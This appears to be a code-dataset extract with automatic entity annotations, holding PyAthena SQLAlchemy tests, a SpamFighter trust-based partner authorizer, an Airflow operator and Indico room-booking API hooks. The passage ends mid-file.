@with_engine()
def test_char_length(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
result = (
sqlalchemy.select(
[sqlalchemy.func.char_length(one_row_complex.c.col_string)]
)
.execute()
.scalar()
)
self.assertEqual(result, len("a string"))
@with_engine()
def test_reflect_select(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row_complex.c), 15)
self.assertIsInstance(one_row_complex.c.col_string, Column)
rows = one_row_complex.select().execute().fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(
list(rows[0]),
[
True,
127,
32767,
2147483647,
9223372036854775807,
0.5,
0.25,
"a string",
datetime(2017, 1, 1, 0, 0, 0),
date(2017, 1, 2),
b"123",
"[1, 2]",
"{1=2, 3=4}",
"{a=1, b=2}",
Decimal("0.1"),
],
)
self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)
self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)
self.assertIsInstance(one_row_complex.c.col_date.type, DATE)
self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)
self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)
@with_engine()
def test_reserved_words(self, engine, conn):
"""Presto uses double quotes, not backticks"""
fake_table = Table(
"select", MetaData(bind=engine), Column("current_timestamp", STRINGTYPE)
)
query = str(fake_table.select(fake_table.c.current_timestamp == "a"))
self.assertIn('"select"', query)
self.assertIn('"current_timestamp"', query)
self.assertNotIn("`select`", query)
self.assertNotIn("`current_timestamp`", query)
@with_engine()
def test_retry_if_data_catalog_exception(self, engine, conn):
dialect = engine.dialect
exc = OperationalError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Namespace does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Table does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError("", None, "foobar.")
self.assertTrue(
dialect._retry_if_data_catalog_exception(exc, "foobar", "foobar")
)
exc = ProgrammingError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
@with_engine()
def test_get_column_type(self, engine, conn):
dialect = engine.dialect
self.assertEqual(dialect._get_column_type("boolean"), "boolean")
self.assertEqual(dialect._get_column_type("tinyint"), "tinyint")
self.assertEqual(dialect._get_column_type("smallint"), "smallint")
self.assertEqual(dialect._get_column_type("integer"), "integer")
self.assertEqual(dialect._get_column_type("bigint"), "bigint")
self.assertEqual(dialect._get_column_type("real"), "real")
self.assertEqual(dialect._get_column_type("double"), "double")
self.assertEqual(dialect._get_column_type("varchar"), "varchar")
self.assertEqual(dialect._get_column_type("timestamp"), "timestamp")
self.assertEqual(dialect._get_column_type("date"), "date")
self.assertEqual(dialect._get_column_type("varbinary"), "varbinary")
self.assertEqual(dialect._get_column_type("array(integer)"), "array")
self.assertEqual(dialect._get_column_type("map(integer, integer)"), "map")
self.assertEqual(dialect._get_column_type("row(a integer, b integer)"), "row")
self.assertEqual(dialect._get_column_type("decimal(10,1)"), "decimal")
@with_engine()
def test_contain_percents_character_query(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d')
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query)
self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])
query_with_limit = (
sqlalchemy.sql.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit)
self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])
@with_engine()
def test_query_with_parameter(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT :word
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query, word="cat")
self.assertEqual(result.fetchall(), [("cat",)])
query_with_limit = (
sqlalchemy.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit, word="cat")
self.assertEqual(result_with_limit.fetchall(), [("cat",)])
@with_engine()
def test_contain_percents_character_query_with_parameter(self, engine, conn):
select1 = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d'), :word
"""
)
table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()
query1 = sqlalchemy.select(["*"]).select_from(table_expression1)
result1 = engine.execute(query1, word="cat")
self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), "cat")])
query_with_limit1 = (
sqlalchemy.select(["*"]).select_from(table_expression1).limit(1)
)
result_with_limit1 = engine.execute(query_with_limit1, word="cat")
self.assertEqual(
result_with_limit1.fetchall(), [(datetime(2019, 10, 30), "cat")]
)
select2 = sqlalchemy.sql.text(
"""
SELECT col_string, :param FROM one_row_complex
WHERE col_string LIKE 'a%' OR col_string LIKE :param
"""
)
table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()
query2 = sqlalchemy.select(["*"]).select_from(table_expression2)
result2 = engine.execute(query2, param="b%")
self.assertEqual(result2.fetchall(), [("a string", "b%")])
query_with_limit2 = (
sqlalchemy.select(["*"]).select_from(table_expression2).limit(1)
)
result_with_limit2 = engine.execute(query_with_limit2, param="b%")
self.assertEqual(result_with_limit2.fetchall(), [("a string", "b%")])
@with_engine()
def test_nan_checks(self, engine, conn):
dialect = engine.dialect
self.assertFalse(dialect._is_nan("string"))
self.assertFalse(dialect._is_nan(1))
self.assertTrue(dialect._is_nan(float("nan")))
@with_engine()
def test_to_sql(self, engine, conn):
# TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:
# Column 'foobar' cannot be resolved.
# def _format_bytes(formatter, escaper, val):
# return val.decode()
table_name = "to_sql_{0}".format(str(uuid.uuid4()).replace("-", ""))
df = pd.DataFrame(
{
"col_int": np.int32([1]),
"col_bigint": np.int64([12345]),
"col_float": np.float32([1.0]),
"col_double": np.float64([1.2345]),
"col_string": ["a"],
"col_boolean": np.bool_([True]),
"col_timestamp": [datetime(2020, 1, 1, 0, 0, 0)],
"col_date": [date(2020, 12, 31)],
# "col_binary": "foobar".encode(),
}
)
# Explicitly specify column order
df = df[
[
"col_int",
"col_bigint",
"col_float",
"col_double",
"col_string",
"col_boolean",
"col_timestamp",
"col_date",
# "col_binary",
]
]
df.to_sql(
table_name,
engine,
schema=SCHEMA,
index=False,
if_exists="replace",
method="multi",
)
table = Table(table_name, MetaData(bind=engine), autoload=True)
self.assertEqual(
table.select().execute().fetchall(),
[
(
1,
12345,
1.0,
1.2345,
"a",
True,
datetime(2020, 1, 1, 0, 0, 0),
date(2020, 12, 31),
# "foobar".encode(),
)
],
)
@with_engine(verify="false")
def test_conn_str_verify(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertFalse(kwargs["verify"])
@with_engine(duration_seconds="1800")
def test_conn_str_duration_seconds(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertEqual(kwargs["duration_seconds"], 1800)
@with_engine(poll_interval="5")
def test_conn_str_poll_interval(self, engine, conn):
self.assertEqual(conn.connection.poll_interval, 5)
@with_engine(kill_on_interrupt="false")
def test_conn_str_kill_on_interrupt(self, engine, conn):
self.assertFalse(conn.connection.kill_on_interrupt)
| 20,066 | [['URL', 'urllib.pa'], ['LOCATION', 'TestCase'], ['PERSON', 'quote_plus(ENV.s3_staging_dir'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'one_row_complex'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'meta.tables'], ['PERSON', 'meta.tables'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'datetime(2017'], ['PERSON', 'Decimal("0.1'], ['LOCATION', 'conn'], ['PERSON', 'fake_table'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'select1'], ['PERSON', 'query1'], ['PERSON', 'sqlalchemy.select(["*"]).select_from(table_expression1'], ['PERSON', 'query2 ='], ['PERSON', 'result2'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TODO'], ['DATE_TIME', '12'], ['DATE_TIME', '12'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py'], ['URL', 'https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/core/reflection.html'], ['URL', 'sqlalchemy.sql.sc'], ['URL', 'tests.co'], ['URL', '.amazonaws.com'], ['URL', 'str.fo'], ['URL', 'ENV.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 're.se'], ['URL', 'engine.dialect.re'], ['URL', 'engine.dialect.re'], ['URL', 'sqlalchemy.engine.reflection.Inspector.re'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'sqlalchemy.se'], ['URL', 'expression.bi'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'meta.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'insp.ge'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'sqlalchemy.func.ch'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'complex.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 
'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'table.se'], ['URL', 'table.c.cu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'pyathena.er'], ['URL', 'val.de'], ['URL', 'np.int'], ['URL', 'np.int'], ['URL', 'np.bo'], ['URL', 'df.to'], ['URL', 'self.as'], ['URL', 'table.se'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.connection.ki']] |
64 | # -*- coding: utf-8 -*-
#
# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com)
#
# This file is part of SpamFighter.
#
# SpamFighter is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SpamFighter is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SpamFighter. If not, see <http://www.gnu.org/licenses/>.
#
"""
Module for authorizing partners without logins/passwords (on trust).
"""
from zope.interface import implements
from twisted.internet import defer
from spamfighter.interfaces import IPartner, IPartnerAuthorizer
from spamfighter.core.partner import PartnerAuthorizationFailedError
from spamfighter.core.domain import getDefaultDomain, BaseDomain
from spamfighter.plugin import loadPlugin, IDefaultDomainProvider
from spamfighter.utils import config
class NullPartner(object):
"""
    A partner authorized without a login/password (on trust).
    @ivar domain: the partner's root domain
@type domain: L{BaseDomain}
"""
implements(IPartner)
def __init__(self):
"""
        Constructor.
"""
domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)
self.domain = domainProvider.getDefaultDomain()
def rootDomain(self):
"""
        Get the partner's root domain.
        @return: Deferred, the root domain (L{IDomain})
@rtype: C{twisted.internet.defer.Deferred}
"""
return defer.succeed(self.domain)
class NullPartnerAuthorizer(object):
"""
    Authorization provider for partners without a login/password (on trust).
    In this situation, access to SpamFighter is restricted by other means
    (an HTTP proxy, a firewall).
    @ivar partner: the single partner through which all access goes
@type partner: L{NullPartner}
"""
implements(IPartnerAuthorizer)
def __init__(self):
"""
        Constructor.
"""
self.partner = NullPartner()
def authorize(self, partner_info):
"""
        Perform partner authorization.
        @param partner_info: information about the partner
        @return: Deferred, the partner (L{IPartner})
@rtype: C{twisted.internet.defer.Deferred}
"""
if partner_info is not None:
return defer.fail(PartnerAuthorizationFailedError())
return defer.succeed(self.partner)
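# Added illustration: a minimal sketch (not part of the original module) of
# the trust-based flow driven by the classes above.
def _demo_null_authorization():
    authorizer = NullPartnerAuthorizer()
    # Without credentials the Deferred fires with the single NullPartner.
    d_ok = authorizer.authorize(None)
    d_ok.addCallback(lambda partner: partner.rootDomain())
    # With any credentials the Deferred fires its errback with
    # PartnerAuthorizationFailedError.
    d_fail = authorizer.authorize({'login': 'x', 'password': 'y'})
    d_fail.addErrback(lambda f: f.trap(PartnerAuthorizationFailedError))
    return d_ok, d_fail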
| 2,802 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'SpamFighter, Copyright 2008'], ['DATE_TIME', '2009'], ['PERSON', 'Модуль авторизации'], ['PERSON', 'паролей'], ['PERSON', 'Партнер'], ['PERSON', 'Получить'], ['NRP', '@rtype'], ['NRP', 'Провайдер'], ['LOCATION', 'партнеров без логина'], ['LOCATION', 'доступ'], ['PERSON', 'который обеспечивает весь'], ['NRP', 'self.partner'], ['PERSON', 'Выполнить авторизацию'], ['NRP', '@rtype'], ['URL', 'http://netstream.ru/,'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'zope.int'], ['URL', 'twisted.int'], ['URL', 'spamfighter.int'], ['URL', 'spamfighter.core.pa'], ['URL', 'spamfighter.core.do'], ['URL', 'spamfighter.pl'], ['URL', 'config.plugins.domain.nu'], ['URL', 'self.do'], ['URL', 'domainProvider.ge'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.do'], ['URL', 'self.pa'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.pa']] |
65 | """
.. module:: operators.dive_operator
:synopsis: DivePythonOperator for use with TaskRunner
.. moduleauthor:: Laura Lorenz dummy@email.com
.. moduleauthor:: Miriam Sexton dummy@email.com
"""
from airflow.operators import PythonOperator
from .dive_operator import DiveOperator
class DivePythonOperator(DiveOperator, PythonOperator):
"""
Python operator that can send along data dependencies to its callable.
Generates the callable by initializing its python object and calling its method.
"""
def __init__(self, python_object, python_method="run", *args, **kwargs):
self.python_object = python_object
self.python_method = python_method
kwargs['python_callable'] = None
super(DivePythonOperator, self).__init__(*args, **kwargs)
def pre_execute(self, context):
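        # Added note: merge the operator's own kwargs and its upstream data
        # dependencies into the template context, then build the callable by
        # instantiating python_object with that context and looking up
        # python_method on the resulting instance.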
context.update(self.op_kwargs)
context.update({"data_dependencies": self.data_dependencies})
instantiated_object = self.python_object(context)
self.python_callable = getattr(instantiated_object, self.python_method)
| 1,075 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Laura Lorenz'], ['PERSON', 'Miriam Sexton'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py']] |
66 | # -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
import icalendar
import pytz
from babel.dates import get_timezone
from sqlalchemy import Time, Date
from sqlalchemy.sql import cast
from werkzeug.datastructures import OrderedMultiDict, MultiDict
from indico.core.config import Config
from indico.core.db import db
from indico.core.errors import IndicoError
from indico.modules.rb.utils import rb_check_user_access
from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences
from indico.modules.rb.models.locations import Location
from indico.modules.rb.models.rooms import Room
from indico.util.date_time import utc_to_server
from indico.web.http_api import HTTPAPIHook
from indico.web.http_api.metadata import ical
from indico.web.http_api.responses import HTTPAPIError
from indico.web.http_api.util import get_query_parameter
from MaKaC.authentication import AuthenticatorMgr
from MaKaC.common.info import HelperMaKaCInfo
class RoomBookingHookBase(HTTPAPIHook):
GUEST_ALLOWED = False
def _getParams(self):
super(RoomBookingHookBase, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no'))
def _hasAccess(self, aw):
return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())
@HTTPAPIHook.register
class RoomHook(RoomBookingHookBase):
# e.g. /export/room/CERN/23.json
TYPES = ('room',)
RE = r'(?P<location>[\w\s]+)/(?P<idlist>\w+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500,
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomHook, self)._getParams()
self._location = self._pathParams['location']
self._ids = map(int, self._pathParams['idlist'].split('-'))
if self._detail not in {'rooms', 'reservations'}:
raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400)
def export_room(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
# Retrieve rooms
rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))
# Retrieve reservations
reservations = None
if self._detail == 'reservations':
reservations = OrderedMultiDict(_export_reservations(self, True, False, [
Reservation.room_id.in_(x['room'].id for x in rooms_data)
]))
for result in rooms_data:
yield _serializable_room(result, reservations)
@HTTPAPIHook.register
class RoomNameHook(RoomBookingHookBase):
# e.g. /export/roomName/CERN/pump.json
GUEST_ALLOWED = True
TYPES = ('roomName', )
RE = r'(?P<location>[\w\s]+)/(?P<room_name>[\w\s\-]+)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomNameHook, self)._getParams()
self._location = self._pathParams['location']
self._room_name = self._pathParams['room_name']
def _hasAccess(self, aw):
# Access to RB data (no reservations) is public
return Config.getInstance().getIsRoomBookingActive()
def export_roomName(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
search_str = '%{}%'.format(self._room_name)
rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])
for result in rooms_data:
yield _serializable_room(result)
@HTTPAPIHook.register
class ReservationHook(RoomBookingHookBase):
# e.g. /export/reservation/CERN.json
TYPES = ('reservation', )
RE = r'(?P<loclist>[\w\s]+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'reservations'
MAX_RECORDS = {
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics')
@property
def serializer_args(self):
return {'ical_serializer': _ical_serialize_reservation}
def _getParams(self):
super(ReservationHook, self)._getParams()
self._locations = self._pathParams['loclist'].split('-')
def export_reservation(self, aw):
locations = Location.find_all(Location.name.in_(self._locations))
if not locations:
return
for room_id, reservation in _export_reservations(self, False, True):
yield reservation
@HTTPAPIHook.register
class BookRoomHook(HTTPAPIHook):
PREFIX = 'api'
TYPES = ('roomBooking',)
RE = r'bookRoom'
GUEST_ALLOWED = False
VALID_FORMATS = ('json', 'xml')
COMMIT = True
HTTP_POST = True
def _getParams(self):
super(BookRoomHook, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():
raise HTTPAPIError('from/to must be on the same day')
elif self._fromDT >= self._toDT:
raise HTTPAPIError('to must be after from')
elif self._fromDT < datetime.now():
raise HTTPAPIError('You cannot make bookings in the past')
username = get_query_parameter(self._queryParams, 'username')
avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())
if not avatars:
raise HTTPAPIError('Username does not exist')
elif len(avatars) != 1:
raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars)))
avatar = avatars[0]
self._params = {
'room_id': get_query_parameter(self._queryParams, 'roomid'),
'reason': get_query_parameter(self._queryParams, 'reason'),
'booked_for': avatar,
'from': self._fromDT,
'to': self._toDT
}
missing = [key for key, val in self._params.iteritems() if not val]
if missing:
raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing)))
self._room = Room.get(self._params['room_id'])
if not self._room:
raise HTTPAPIError('A room with this ID does not exist')
def _hasAccess(self, aw):
if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):
return False
if self._room.can_be_booked(aw.getUser()):
return True
elif self._room.can_be_prebooked(aw.getUser()):
raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.')
return False
def api_roomBooking(self, aw):
data = MultiDict({
'start_dt': self._params['from'],
'end_dt': self._params['to'],
'repeat_frequency': RepeatFrequency.NEVER,
'repeat_interval': 0,
'room_id': self._room.id,
'booked_for_id': self._params['booked_for'].getId(),
'contact_email': self._params['booked_for'].getEmail(),
'contact_phone': self._params['booked_for'].getTelephone(),
'booking_reason': self._params['reason']
})
try:
reservation = Reservation.create_from_data(self._room, data, aw.getUser())
except ConflictingOccurrences:
raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings')
except IndicoError as e:
raise HTTPAPIError('Failed to create the booking: {}'.format(e))
db.session.add(reservation)
db.session.flush()
return {'reservationID': reservation.id}
def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):
"""Exports reservations.
:param hook: The HTTPAPIHook instance
:param limit_per_room: Should the limit/offset be applied per room
:param include_rooms: Should reservations include room information
"""
filters = list(extra_filters) if extra_filters else []
if hook._fromDT and hook._toDT:
filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())
filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())
elif hook._toDT:
filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())
elif hook._fromDT:
filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())
filters += _get_reservation_state_filter(hook._queryParams)
occurs = [datetime.strptime(x, '%Y-%m-%d').date()
for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))]
data = ['vc_equipment']
if hook._occurrences:
data.append('occurrences')
order = {
'start': Reservation.start_dt,
'end': Reservation.end_dt
}.get(hook._orderBy, Reservation.start_dt)
if hook._descending:
order = order.desc()
reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,
order=order, limit_per_room=limit_per_room, occurs_on=occurs)
for result in reservations_data:
yield result['reservation'].room_id, _serializable_reservation(result, include_rooms)
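# Added illustration (hypothetical usage): the generator yields
# (room_id, serialized_reservation) pairs which RoomHook above groups by room:
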